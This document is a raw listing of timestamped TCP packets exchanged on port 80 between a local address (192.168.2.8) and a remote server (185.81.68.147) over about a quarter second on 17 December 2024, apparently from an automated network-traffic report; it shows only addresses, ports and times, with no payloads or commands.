                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647015095 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647241116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647335052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.647932053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648015976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648258924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648605108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648744106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.648950100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.649786949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.649840117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.650537968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.650670052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651134968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651500940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.651663065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652435064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652468920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652468920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.652534008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653393030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653464079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.653512955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654367924 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654459953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.654593945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655359030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655400038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.655430079 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656256914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656317949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656327963 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.656470060 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657253027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657275915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.657393932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658147097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658260107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.658389091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659105062 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659225941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.659352064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660065889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660182953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660650015 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.660995007 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661185980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661710024 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.661979914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662081003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662640095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.662910938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663031101 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663100958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663842916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.663898945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.664043903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.664820910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.664906979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.665045023 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.665842056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.666007042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.666285038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.666747093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.666841984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.667000055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.667639017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.667824984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.667968988 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.668692112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.668889046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.669416904 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.669560909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.669740915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.669966936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.670552015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.670655966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.670931101 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.671458960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.671534061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.671660900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.672399044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.672517061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.672599077 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.673389912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.673554897 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.673688889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.674305916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.674422979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.674501896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.675291061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.675405025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.675506115 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.676254034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.676286936 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.676474094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.677362919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.677381992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.677541018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.678139925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.678303003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.678544998 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.679105043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.679239035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.679330111 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.680075884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.680121899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.680309057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.681005001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.681107044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.681212902 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.681967974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.682112932 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.682229996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.682878971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.683083057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.683331966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.683900118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.683995008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.684065104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.684793949 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.684926033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.685069084 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.685830116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.685921907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.685986996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.686722994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.686872005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.687252045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.687649965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.687772036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.687918901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.688611031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.688757896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.688955069 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.689526081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.739345074 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.831691980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.831737995 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.831875086 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.832127094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.832266092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.832633018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.833071947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.833188057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.833259106 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.834283113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.834434986 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.834517002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.835061073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.835084915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.835185051 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.835988998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.836050034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.836611032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.836895943 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.837043047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.837749004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.837836981 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.837934017 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.838751078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.838752985 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.838877916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.839067936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.839746952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.839917898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.840157032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.840692997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.840815067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.841669083 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.841775894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.841955900 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.842012882 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.842713118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.842839956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.842989922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.843794107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.843898058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.844122887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.844492912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.844619989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.844688892 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.845432043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.845545053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.845630884 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846415997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846478939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.846592903 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.847378969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.847560883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848308086 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848371983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848406076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.848536968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849275112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849349022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.849446058 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850205898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850261927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.850693941 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851169109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851247072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.851336956 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852119923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852243900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.852327108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853082895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853209972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.853446007 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854033947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854171991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.854285002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855101109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855166912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855320930 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.855979919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856098890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856177092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856910944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.856966972 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857165098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857846975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.857903004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858134031 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858786106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.858900070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859731913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859827995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859848022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.859899044 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860690117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860810041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.860877037 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861649990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861759901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.861866951 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862584114 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862710953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.862813950 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863573074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863737106 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.863840103 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864511967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864607096 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.864742994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865453959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865571976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.865634918 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866425991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866549015 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.866697073 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867363930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867466927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.867547035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868289948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868396044 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.868942976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.869271994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.869452000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870131969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870213032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870310068 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.870457888 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.871189117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.871335983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872168064 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872189045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872251987 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.872376919 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873116970 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873281956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.873455048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874058962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874393940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874720097 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.874985933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:10.875111103 CET8049709185.81.68.147192.168.2.8
